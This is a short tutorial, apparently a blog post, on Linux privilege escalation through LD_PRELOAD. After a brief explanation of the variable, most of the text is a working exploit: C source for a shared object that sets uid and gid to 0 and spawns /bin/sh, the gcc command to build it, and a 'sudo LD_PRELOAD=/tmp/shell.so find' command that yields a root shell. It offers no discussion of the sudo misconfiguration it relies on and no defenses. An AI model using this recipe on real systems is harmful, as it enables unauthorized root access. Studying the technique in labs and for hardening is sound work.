Linux Privilege Escalation Using LD_PRELOAD

LD_PRELOAD is an environment variable in Linux that allows users to load custom shared libraries before any other libraries during the execution of a program. Attackers can exploit this feature to inject malicious code and potentially escalate privileges, especially if the target program is executed with elevated permissions (e.g., as root).

How LD_PRELOAD Works

1. Purpose: LD_PRELOAD is used for debugging or testing by overriding functions in shared libraries.
2. Mechanism: When a program is executed, the dynamic linker checks the LD_PRELOAD variable for a shared library path. If specified, this library is loaded before others, allowing its functions to override standard library functions.

Privilege Escalation

Let’s generate a C program file inside the /tmp directory.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

#include <stdio.h> 
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0); 
    setuid(0);

    system("/bin/sh"); 
}

Save it as shell.c inside /tmp.

Next, compile it to generate a shared object with a .so extension, similar to a .dll file in the Windows operating system. Enter the following command:

1

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Check the generated file:

1

ls -al shell.so

Now execute the find command with LD_PRELOAD set to the path of the shared object:

1

sudo LD_PRELOAD=/tmp/shell.so find

To verify the privileges, run:

1
2

id
whoami

And finally, you should have obtained root privileges! 😉

Resources :

• https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/
• https://www.youtube.com/watch?v=bzjnIi5u9OQ